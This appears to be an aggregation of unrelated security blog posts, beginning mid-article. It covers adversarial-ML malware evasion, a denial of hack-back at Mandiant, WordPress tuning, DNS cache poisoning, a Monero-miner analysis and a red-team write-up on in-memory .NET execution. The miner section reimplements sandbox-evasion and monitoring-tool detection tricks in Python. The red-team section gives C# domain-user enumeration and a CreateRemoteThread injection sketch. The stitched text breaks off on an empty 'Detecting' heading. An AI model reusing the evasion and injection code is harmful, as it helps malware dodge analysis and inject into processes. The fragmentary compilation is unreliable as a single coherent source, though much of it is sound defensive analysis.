Binary black-box attacks are the most general, since the attacker does not know anything about the model in use and the anti-malware engine simply answers True or False (it is malware or it is not). In 2017, W. Hu and Y. Tan produced a great piece of work described in "Generating Adversarial Malware Examples for Malware Classification" (here). The authors developed MalGAN, an adversarial malware generator able to generate valid PE malware that evades a static black-box PE malware engine. The idea behind MalGAN is simple. First, the attacker maps the black-box outputs by providing specific, known samples (malware and benign PE files). After the mapping phase, the attacker builds a model that behaves like the black-box model: a substitute model trained to mimic the targeted one. The substitute model is then used as the target model in a gradient-computation GAN to produce evasive malware. The authors reported 100% efficacy in bypassing the target model. H. S. Anderson et al., in "Evading Machine Learning Malware Detection" (here), adopted a reinforcement learning approach. The following image shows the Markov decision process formulation of the malware evasion reinforcement learning problem.

Image from: Evading Machine Learning Malware Detection


The agent is the function that manipulates the sample depending on the environment state. Both the reward and the state are used as input by the agent in order to decide on the next actions. The agent learns from the reward, which depends on the state that was reached: for example, the reward can be higher if the reached state is close to the desired one, and lower otherwise. The authors use a Q-learning technique so that an action with a poor immediate reward is not underestimated when it is significant over the medium to long term.

"In our framework, the actions space A consists of a set of modifications to the PE file that (a) don’t break the PE file format, and (b) don’t alter the intended functionality of the malware sample. The reward function is measured by the anti-malware engine, which is converted to a reward: 0 if the modified malware sample is judged to be benign, and 1 if it is deemed to be malicious. The reward and state are then fed back into the agent."

Final Considerations

Machine learning, and more generally speaking artificial intelligence, is useful for detecting cyber attacks, but unfortunately, as widely shown in this post, it is not enough per se. Attackers can use techniques such as adversarial machine learning to evade machine learning detectors. Cyber security analysts will still play a fundamental role in cyber security science and technology for many years to come. A technology that promises to assure cyber security protection without human interaction is not going to work.



Bejtlich on the APT1 Report: No Hack Back

Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.

I would like to add my own color to this situation.

First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six-year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.

Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.

Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:


In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.

Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report's creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself, in case current Mandiant or FireEye employees had been told not to talk to outsiders about the case.

What do I think happened here? I agree with the theory that Mr Sanger misinterpreted the reconstructed RDP sessions for some sort of "camera access." I have no idea about the "bros" or "leather jackets" comments!

In the spirit of full disclosure, prior to publication, Mr Sanger tried to reach me to discuss his book via email. I was sick and told him I had to pass. Ellen Nakashima also contacted me; I believe she was doing research for the book. She asked a few questions about the origin of the term APT, which I answered. I do not have the book so I do not know if I am cited, or if my message was included.

The bottom line is that Mandiant and FireEye did not conduct any hack back for the APT1 report.

Update: Some of you wondered about Ellen's role. I confirmed last night that she was working on her own project.

Tuning up my WordPress Install

Dreamhost was sending me cryptic emails about my site using too many resources and then dying as a result.

Then Jetpack site monitoring was finding the site down, presumably due to running out of resources.

And the homepage loaded too slowly.

So a technical problem was at hand.

There aren’t a lot of resources out there for troubleshooting this sort of issue. GoDaddy has a long-abandoned plugin that would tell you which WordPress plugins were using the most RAM; it no longer worked. The current state of site troubleshooting is to disable your plugins one at a time and use another plugin to monitor site RAM usage. I found it better to start with a list of plugins known to cause excessive resource usage, and then run a speed test at gtmetrix.com.

So I said goodbye to some plugins. The one I’ll miss the most is one that displayed related posts if you viewed a post from the single-post page. Plugins like that are designed to keep eyeballs on the page. I also disabled the Better Tag Cloud plugin. I liked it there in the sidebar. Tags are better than categories in my opinion. But tag clouds are really a thing of the past. So is blogging, for that matter. Yet here I am.

Jetpack is frequently a target for people trying to save resources. After reviewing the features I used, I decided to disable it.

The main thing slowing down my page was the embedded YouTube videos. I installed WP YouTube Lyte, a plugin that displays a screenshot of the video rather than embedding the actual video. When you click on the screenshot, the video loads. If you’re on mobile, you’ll need to click twice. If you’re in an RSS reader, you’ll need to click the view-on-YouTube link.

Lastly, I made some changes to caching at Cloudflare following the cloudflare site settings listed in an article on W3 Total Cache and Cloudflare. I did not install W3 Total Cache. I’ll have to keep an eye on it to see if I’ve successfully enabled caching without delaying when people see my content.

When I started, the front page of InfosecBlog.org was loading in 3 to 4 seconds according to GTmetrix. It’s now loading in 0.6 to 1 second.


Detecting Kernel Memory Disclosure – Whitepaper

Posted by Mateusz Jurczyk, Project Zero

Since early 2017, we have been working on Bochspwn Reloaded – a piece of dynamic binary instrumentation built on top of the Bochs IA-32 software emulator, designed to identify memory disclosure vulnerabilities in operating system kernels. Over the course of the project, we successfully used it to discover and report over 70 previously unknown security issues in Windows, and more than 10 bugs in Linux. We discussed the general design of the tool at REcon Montreal and Black Hat USA in June and July last year, and followed up with the description of the latest implemented features and their results at INFILTRATE in April 2018 (click on the links for slides).

As we learned during this study, the problem of leaking uninitialized kernel memory to user space is not caused merely by simple programming errors. Instead, it is deeply rooted in the nature of the C programming language, and has been around since the very early days of privilege separation in operating systems. In an attempt to systematically outline the background of the bug class and the current state of the art, we wrote a comprehensive paper on this subject. It aims to provide an exhaustive guide to kernel infoleaks, their genesis, related prior work, means of detection and future avenues of research. While a significant portion of the document is dedicated to Bochspwn Reloaded, it also covers other methods of infoleak detection, non-memory data sinks and alternative applications of full-system instrumentation, including the evaluation of some of the ideas based on the developed prototypes and experiments performed as part of this work.

Without further ado, enjoy the read:

Cache Poisoning of Mail Handling Domains Revisited

In 2014 we investigated cache poisoning and found it in some damaging places, like mail-handling domains. It can't be assumed that behaviors on the internet continue unchanged, so I wanted to repeat the measurement. I used the same passive DNS data source and the same method, now four years later, to investigate this question.

In summary, cache poisoning still appears to occur at about the same rate. As before, our method does not provide direct evidence of the mechanism; we only observe responses to queries from recursive resolvers. However, exactly what domains are targeted might give us some information about the underlying cause if it is correlated with domains or IPs in other reporting. In that regard, the focus seems to have shifted away from mail-handling domains.

Of the original 302 IP addresses that were found to be returning incorrect results, 112 are still doing so. In addition, I found 247 IP addresses that are also giving incorrect results, for a total of 359 IP addresses. You can download that list here: mxlist-ips.txt

In examining the results, I also found traces of a browser hijacker called fwdservice.com. Browser hijackers are an insidious type of malware that insinuate themselves into your browser to redirect search results, serve ads, spy on your actions, or perform other unwanted actions.

Fwdservice.com redirects search results to its own site and has been around since at least 2012. The site has also been associated with phishing and malware, just to add to its poor behavior. The browser hijacker pretends to be a useful search engine but serves many more ads and poor results specified by the sponsor of the ads. It's also more than a simple single-browser hijacker: it will affect every browser you have on your system.

It works by using a DNS redirect so that no matter where you think you're going, you're actually going to fwdservice.com. This means that your queries are no longer going to the nameserver you specified, but to one that the malware prefers. While I was looking for the A record poisoning, I found 317 IP addresses that were redirecting results for domains to the fwdservice.com IP address; in other words, IP addresses that were being used by the malware to redirect your search results. You can download that list here: fwdservice-ips.txt
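
As a rough illustration of the filtering involved, the Python sketch below flags resolver IPs whose recorded answers point at a known fwdservice.com address; the record format and the bad-IP value are placeholders, since the real analysis runs over a passive DNS database rather than this toy list.

    # Each passive-DNS style record is (resolver_ip, queried_name, answer_ip).
    # BAD_ANSWERS would hold the IP address(es) observed hosting fwdservice.com;
    # the value below is a documentation-range placeholder, not the real address.
    BAD_ANSWERS = {"203.0.113.45"}

    def find_redirecting_resolvers(records):
        """Return the set of resolver IPs that answered any query with a bad IP."""
        hijacking = set()
        for resolver_ip, qname, answer_ip in records:
            if answer_ip in BAD_ANSWERS:
                hijacking.add(resolver_ip)
        return hijacking

    # Toy usage with fabricated records.
    sample_records = [
        ("198.51.100.7", "www.example.com", "203.0.113.45"),
        ("198.51.100.9", "www.example.com", "93.184.216.34"),
    ]
    print(find_redirecting_resolvers(sample_records))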

Due to the nature of passive DNS, this is a subset of the possible IP addresses used by fwdservice.com. Unfortunately, this means there are more out there. But by blocking these IP addresses, we can start to interfere with the browser hijacker. We should also continue to look for these DNS redirectors; they're insidious and easy to miss.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new and improved detection techniques, developers of these binaries have begun to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection for as long as possible. In this blog article, we highlight some of our findings from analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF
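
A repeating-key XOR like this is trivial to undo outside the sample. A minimal Python sketch using the key above (the file paths are placeholders) would be:

    import sys

    # 16-byte XOR key extracted from the .Net crypter (see above).
    KEY = bytes.fromhex("50f596dff06177423943fe3081956faf")

    def xor_decrypt(data, key=KEY):
        """Repeating-key XOR, as used to recover the embedded executable."""
        return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

    if __name__ == "__main__":
        blob = open(sys.argv[1], "rb").read()      # encrypted resource dumped from the sample
        open(sys.argv[2], "wb").write(xor_decrypt(blob))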

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.
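
The same routine can be reproduced offline. The sketch below mirrors the flow in Figure 1, PBKDF2 key derivation followed by AES-256 decryption; the hash function, passphrase, salt, IV, iteration count and cipher mode are assumptions that must be read out of the decompiled .Net code.

    import hashlib
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def decrypt_resource(ciphertext, passphrase, salt, iv, iterations=1000):
        """Decrypt the embedded resource (all key-derivation parameters are assumptions).

        passphrase, salt, iv -- bytes recovered from the .Net code
        """
        # Derive a 32-byte AES-256 key with PBKDF2-HMAC (SHA1 is the .Net
        # Rfc2898DeriveBytes default, assumed here).
        key = hashlib.pbkdf2_hmac("sha1", passphrase, salt, iterations, dklen=32)
        # CBC mode is assumed; PKCS7 padding is left in place.
        decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return decryptor.update(ciphertext) + decryptor.finalize()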

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools via GetWindowTextW.
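
The check boils down to walking the top-level windows and comparing their titles against a blacklist. A small Python/ctypes approximation (detection only, nothing gets terminated) is shown below; the title list is illustrative and may differ from the one embedded in the sample.

    import ctypes
    from ctypes import wintypes

    user32 = ctypes.windll.user32
    SUSPICIOUS_TITLES = ("process explorer", "process monitor", "wireshark", "procmon")

    def find_monitoring_windows():
        found = []

        @ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND, wintypes.LPARAM)
        def enum_proc(hwnd, lparam):
            length = user32.GetWindowTextLengthW(hwnd)
            if length:
                buf = ctypes.create_unicode_buffer(length + 1)
                user32.GetWindowTextW(hwnd, buf, length + 1)
                title = buf.value.lower()
                if any(s in title for s in SUSPICIOUS_TITLES):
                    found.append(buf.value)
            return True  # keep enumerating

        user32.EnumWindows(enum_proc, 0)
        return found

    if __name__ == "__main__":
        print(find_monitoring_windows())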

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more detail: the code measures the time interval between two subsequent user inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented by simulating random user interactions.
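
A close approximation of this check in Python/ctypes, using the same GetLastInputInfo API shown in Figure 5, looks like the following; the one-minute threshold is the one described above.

    import ctypes
    from ctypes import wintypes

    class LASTINPUTINFO(ctypes.Structure):
        _fields_ = [("cbSize", wintypes.UINT),
                    ("dwTime", wintypes.DWORD)]

    def seconds_since_last_input():
        info = LASTINPUTINFO()
        info.cbSize = ctypes.sizeof(LASTINPUTINFO)
        if not ctypes.windll.user32.GetLastInputInfo(ctypes.byref(info)):
            raise ctypes.WinError()
        # GetTickCount and dwTime are both milliseconds since boot.
        return (ctypes.windll.kernel32.GetTickCount() - info.dwTime) / 1000.0

    if __name__ == "__main__":
        idle = seconds_since_last_input()
        print("Idle for %.1f seconds -> %s" % (
            idle, "looks like a sandbox" if idle > 60 else "looks like a real user"))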

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As further detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Since no answer is meant to be returned (interestingly enough, we know of some devices that erroneously reply to those ICMP packets), the IcmpSendEcho call has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noting that a similar trick has previously been used by some infected CCleaner samples. In that case, the malicious shellcode went a step further by checking whether the timeout parameter had been patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).
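
For completeness, the delay trick itself is easy to reproduce with ctypes: the sketch below pings the reserved multicast address with a 30-second timeout, which simply blocks the calling thread when nothing answers. Parameter marshalling details (such as the reply buffer size) are kept deliberately rough.

    import ctypes
    import socket
    import struct

    iphlpapi = ctypes.windll.iphlpapi

    def icmp_delay(target="224.0.0.0", timeout_ms=30000):
        handle = iphlpapi.IcmpCreateFile()
        # Destination is an IPv4 address in network byte order packed into a DWORD.
        dest = struct.unpack("<I", socket.inet_aton(target))[0]
        payload = b"A" * 32
        # Reply buffer must hold at least one ICMP_ECHO_REPLY structure plus the payload.
        reply = ctypes.create_string_buffer(1024)
        # Blocks for up to timeout_ms because 224.0.0.0 never answers.
        iphlpapi.IcmpSendEcho(handle, dest, payload, len(payload),
                              None, reply, len(reply), timeout_ms)
        iphlpapi.IcmpCloseHandle(handle)

    if __name__ == "__main__":
        icmp_delay()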

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless, it is quite worrying that anti-analysis techniques are becoming this mainstream, so much so that they have started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, this is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY


Launching VirusTotal Monitor, a service to mitigate false positives


One of VirusTotal’s core missions is to empower our antivirus partners. By building better tools to detect and study malware, VirusTotal gets to make a dent in the security of billions of users (all those that use the products of our partners). Until now we have focused on helping the antivirus industry flag malicious files, and now we also want to help it fix mistaken detections of legit files, i.e. false positives. At the same time, we want to fix an endemic problem for software developers.

False positives impact antivirus vendors, software developers and end-users. For example, let us imagine a popular streaming service app that allows in-app digital content purchases. We will call it Filmorrific.

Filmorrific happens to be so popular that when an antivirus vendor mistakenly flags it as malware, the AV vendor gets terrible press as major online news sites, computer magazines and blogs report on the issue. This leads to big reputation damage for the AV vendor.

The detection of Filmorrific leads to the software being quarantined and blocked from running on end-user machines. End-users are now unable to access their favourite streaming service, and they are also confused, thinking that Filmorrific has trojanized their machines.

For Filmorrific, the software publisher, this immediately translates into a blackout across the entire user base of the detecting AV vendor. Suddenly, they not only lose revenue coming from the installed base, but also trust from less technical users that do not really understand what is going on, and they get overloaded with support tickets accusing them of infecting user machines. Filmorrific in turn decides to sue the detecting antivirus company for the damage, and we have now come full circle.

Note that in this context, a software developer is not only a company creating an app or program distributed to thousands of machines and including some kind of monetisation strategy. Today, almost every organization builds internal tools that their finance, accounts payable, HR, etc. teams use. All of these tools are prone to false positives, and while this might not have a revenue impact, it certainly has a cost in terms of productivity hours lost because the workforce can’t access a given app.

What if we could kill these three birds with the same stone? Enter VirusTotal Monitor. VirusTotal already runs a multi-antivirus service that aggregates the verdicts of over 70 antivirus engines to give users a second opinion about the maliciousness of the files that they check. Why not take advantage of this setup not only to try to detect badness, but also to flag mistaken detections of legit software?

VirusTotal Monitor is a new service that allows software developers to upload their creations to a private cloud store in VirusTotal. Files in this private bucket are scanned with all 70+ antivirus engines in VirusTotal on a daily basis, using the latest detection signature sets. The files also remain absolutely private and are not shared with third parties; only in the event of a detection is the file shared with the antivirus vendor producing the alert. As soon as a file is detected, both the software developer and the antivirus vendor are notified; the antivirus vendor then has access to the file and its metadata (company behind the file, software developer contact information, etc.) so that it can act on the detection and remediate it if it is indeed considered a false positive. The entire process is automatic.

For antivirus vendors this is a big win, as they can now have context about a file: Who is the company behind it? When was it released? In which software suites is it found? What are the main file names with which it is distributed? For software developers it is an equally big win, as they can upload their creations to Monitor at the pre-publish stage, to ensure a release without issues. They can also keep their files in the system, to automate notification of false positives to antivirus vendors in the future. Software developers no longer have to interact with 70 different vendors, each having its own interface and strenuous process for communicating issues.

In particular, software vendors use a Google Drive-like interface where they can upload their software collections and provide details about the files:


Upon upload, the files are immediately scanned with the 70+ antivirus engines in VirusTotal, and then once a day thereafter. At any point in time you can refer to the Analyses view in order to see the health of your collection with respect to false positives:


All of this scanning activity is summarized in the dashboard where users land on subsequent accesses to the platform:


Developers are not forced to use this web interface, as the platform allows email notifications and offers a full REST API that is very useful when automating software release pipelines:
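To give a flavour of what that automation might look like, the sketch below uploads a freshly built artifact to a Monitor collection as the last step of a CI job. Note that the endpoint path, the "path" form field and the "x-apikey" header shown here are illustrative assumptions rather than values taken from the Monitor API documentation, so consult the docs before wiring anything like this into a real pipeline.

// Illustrative sketch only: the endpoint URL and form field names are assumptions,
// not documented Monitor API values. C#/.NET is used here purely as an example.
using System;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;

class MonitorUploadSketch
{
    static async Task Main(string[] args)
    {
        string apiKey = Environment.GetEnvironmentVariable("VT_MONITOR_API_KEY");
        string artifact = args[0]; // e.g. the installer produced by the build job

        using (var client = new HttpClient())
        {
            client.DefaultRequestHeaders.Add("x-apikey", apiKey); // assumed auth header

            var form = new MultipartFormDataContent();
            form.Add(new ByteArrayContent(File.ReadAllBytes(artifact)), "file", Path.GetFileName(artifact));
            // Hypothetical destination path inside the Monitor collection:
            form.Add(new StringContent("/releases/" + Path.GetFileName(artifact)), "path");

            // Hypothetical endpoint; check the Monitor API documentation for the real one.
            HttpResponseMessage response =
                await client.PostAsync("https://www.virustotal.com/api/v3/monitor/items", form);

            Console.WriteLine("Upload status: " + (int)response.StatusCode);
            Console.WriteLine(await response.Content.ReadAsStringAsync());
        }
    }
}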

On their end, antivirus vendors also see something similar. They get access to a platform with all items that the particular engine detects and they can integrate with it programmatically via a different API endpoint. This is how certain vendors are able to quickly react and get over 200 false positives from our test bed fixed within minutes:


As previously stated, all files in this flow are private; they are not distributed to third parties, only to antivirus vendors producing detections. That said, if one of the files in a Monitor collection happens to be uploaded to the standard public VirusTotal service, we will highlight that the file belongs to an organization in Monitor and will display the pertinent detections in orange rather than red:


VirusTotal Monitor is not a free pass to get any file whitelisted; sometimes vendors will indeed decide to keep detections for certain software. However, by having contextual information about the author behind a given file, they can prioritize work and make better decisions, hopefully leading to a world with fewer false positives. The idea is to build a collection of known-source software, so that each antivirus vendor can decide what kind of trust-based relationship it has with each software publisher.

As Marc Andreessen once said, "software is eating the world". However, there is not much it can eat unless it can actually execute, so let's make sure that legit software can run.

Bring Your Own Land (BYOL) – A Novel Red Teaming Technique

Introduction

One of the most significant recent developments in sophisticated offensive operations is the use of “Living off the Land” (LotL) techniques by attackers. These techniques leverage legitimate tools present on the system, such as the PowerShell scripting language, in order to execute attacks. The popularity of PowerShell as an offensive tool culminated in the development of entire Red Team frameworks based around it, such as Empire and PowerSploit. In addition, the execution of PowerShell can be obfuscated through the use of tools such as “Invoke-Obfuscation”. In response, defenders have developed detections for the malicious use of legitimate applications. These detections include suspicious parent/child process relationships, suspicious process command line arguments, and even deobfuscation of malicious PowerShell scripts through the use of Script Block Logging.

In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL). I will demonstrate this technique through the use of a custom .NET assembly that replicates some of the functionality of the PowerSploit project. I will also discuss how detections can be developed around BYOL techniques.

Background

At DerbyCon last year, I had the pleasure of meeting Raphael Mudge, the developer behind the Cobalt Strike Remote Access Tool (RAT). During our discussion, I mentioned how useful it would be to be able to load .NET assemblies into Cobalt Strike beacons, similar to how PowerShell scripts can be imported using the “powershell-import” command. During a previous Red Team engagement I had been involved in, the use of PowerShell was precluded by the Endpoint Detection and Response (EDR) agent present on host machines within the target environment. This was a significant issue, as much of my red teaming methodology at the time was based on the use of various PowerShell scripts. For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment. While the use of PowerShell was not an option, I found that no application-based whitelisting was occurring on hosts within the target’s environment. Therefore, I started converting the PowerShell functionality into C# code, compiling assemblies locally as Portable Executable (PE) files, and then uploading the PE files onto target machines and executing them. This tactic was successful, and I was able to use these custom assemblies to elevate privileges up to Domain Admin within the target environment.

Raphael agreed that the ability to load these assemblies in-memory using a Cobalt Strike beacon would be useful, and about 8 months later this functionality was incorporated into Cobalt Strike version 3.11 via the “execute-assembly” command.

“execute-assembly” Demonstration

For this demonstration, a custom C# .NET assembly named “get-users” was used. This assembly replicated some of the functionality of the PowerView “Get-NetUser” cmdlet; it queried the Domain Controller of the specified domain for a list of all current domain accounts. Information obtained included the “SAMAccountName”, “UserGivenName”, and “UserSurname” properties for each account. The domain is specified by passing its FQDN as an argument, and the results are then sent to stdout. The assembly being executed within a Cobalt Strike beacon is shown in Figure 1.


Figure 1: Using the “execute-assembly” command within a Cobalt Strike beacon.
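To give a sense of how compact such an assembly can be, here is a minimal sketch of a get-users-style tool built on System.DirectoryServices. This is not the assembly used in the demonstration; the class name, LDAP filter, example domain and output format are illustrative only.

// Minimal sketch of a "get-users" style assembly (illustrative, not the demo assembly).
// Compile against System.DirectoryServices.dll and run as: get-users.exe corp.example.com
using System;
using System.DirectoryServices;

class GetUsers
{
    static void Main(string[] args)
    {
        string domain = args[0]; // target domain FQDN passed as the only argument

        using (var root = new DirectoryEntry("LDAP://" + domain))
        using (var searcher = new DirectorySearcher(root))
        {
            searcher.Filter = "(&(objectCategory=person)(objectClass=user))";
            searcher.PageSize = 500; // page results so large domains are fully enumerated
            searcher.PropertiesToLoad.Add("samaccountname");
            searcher.PropertiesToLoad.Add("givenname"); // "UserGivenName"
            searcher.PropertiesToLoad.Add("sn");        // "UserSurname"

            foreach (SearchResult result in searcher.FindAll())
            {
                Console.WriteLine("{0}\t{1}\t{2}",
                    GetProp(result, "samaccountname"),
                    GetProp(result, "givenname"),
                    GetProp(result, "sn")); // results are written to stdout
            }
        }
    }

    static string GetProp(SearchResult result, string name)
    {
        return result.Properties[name].Count > 0 ? result.Properties[name][0].ToString() : "";
    }
}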

Simple enough. Now let’s take a look at how this technique works under the hood.

How “execute-assembly” Works

In order to discover more about how the “execute-assembly” command works, the execution performed in Figure 1 was repeated with the host running ProcMon. The results of the process tree from ProcMon after execution are shown in Figure 2.


Figure 2: Process tree from ProcMon after executing “execute-assembly” command.

In Figure 2, the “powershell.exe (2792)” process contains the beacon, while the “rundll32.exe (2708)” process is used to load and execute the “get-users” assembly. Note that “powershell.exe” is shown as the parent process of “rundll32.exe” in this example because the Cobalt Strike beacon was launched by using a PowerShell one-liner; however, nearly any process can be used to host a beacon by leveraging various process migration techniques. From this information, we can determine that the “execute-assembly” command is similar to other Cobalt Strike post-exploitation jobs. In Cobalt Strike, some functions are offloaded to new processes, in order to ensure the stability of the beacon. The rundll32.exe Windows binary is used by default, although this setting can be changed. In order to migrate the necessary code into the new process, the CreateRemoteThread function is used. We can confirm that this function is utilized by monitoring the host with Sysmon while the “execute-assembly” command is performed. The event generated by the use of the CreateRemoteThread function is shown in Figure 3.


Figure 3: CreateRemoteThread Sysmon event, created after performing the “execute-assembly” command.

More information about this event is shown in Figure 4.


Figure 4: Detailed information about the Sysmon CreateRemoteThread event shown in Figure 3.
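For context, the snippet below is a bare-bones sketch of the generic CreateRemoteThread injection pattern that produces the Sysmon Event ID 8 record shown above. It is not Cobalt Strike's actual implementation, and the payload buffer is deliberately left as a placeholder; it is included only to make the API sequence defenders should expect concrete.

// Bare-bones sketch of the classic CreateRemoteThread injection sequence (illustrative only;
// this is NOT Cobalt Strike's implementation and the payload buffer is a placeholder).
using System;
using System.Runtime.InteropServices;

class RemoteThreadSketch
{
    const uint PROCESS_ALL_ACCESS = 0x001F0FFF;
    const uint MEM_COMMIT_RESERVE = 0x3000;       // MEM_COMMIT | MEM_RESERVE
    const uint PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint access, bool inheritHandle, int pid);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr address, uint size, uint allocType, uint protect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr address, byte[] buffer, uint size, out IntPtr written);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr attrs, uint stackSize, IntPtr startAddress, IntPtr param, uint flags, IntPtr threadId);

    static void Inject(int targetPid, byte[] loaderStub)
    {
        IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, targetPid);
        IntPtr remoteBuffer = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)loaderStub.Length,
                                             MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE);
        IntPtr written;
        WriteProcessMemory(hProcess, remoteBuffer, loaderStub, (uint)loaderStub.Length, out written);
        // This call is what Sysmon records as Event ID 8 (CreateRemoteThread).
        CreateRemoteThread(hProcess, IntPtr.Zero, 0, remoteBuffer, IntPtr.Zero, 0, IntPtr.Zero);
    }
}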

In order to execute the provided assembly, the Common Language Runtime (CLR) must be loaded into the newly created process. From the ProcMon logs, we can determine the exact DLLs that are loaded during this step. A portion of these DLLs are shown in Figure 5.


Figure 5: Example of DLLs loaded into rundll32 for hosting the CLR.

In addition, DLLs loaded into the rundll32 process include those necessary for the get-users assembly, such as those for LDAP communication and Kerberos authentication. A portion of these DLLs are shown in Figure 6.


Figure 6: Example of DLLs loaded into rundll32 for Kerberos authentication.

The ProcMon logs confirm that the provided assembly is never written to disk, making the “execute-assembly” command an entirely in-memory attack.

Detecting and Preventing “execute-assembly”

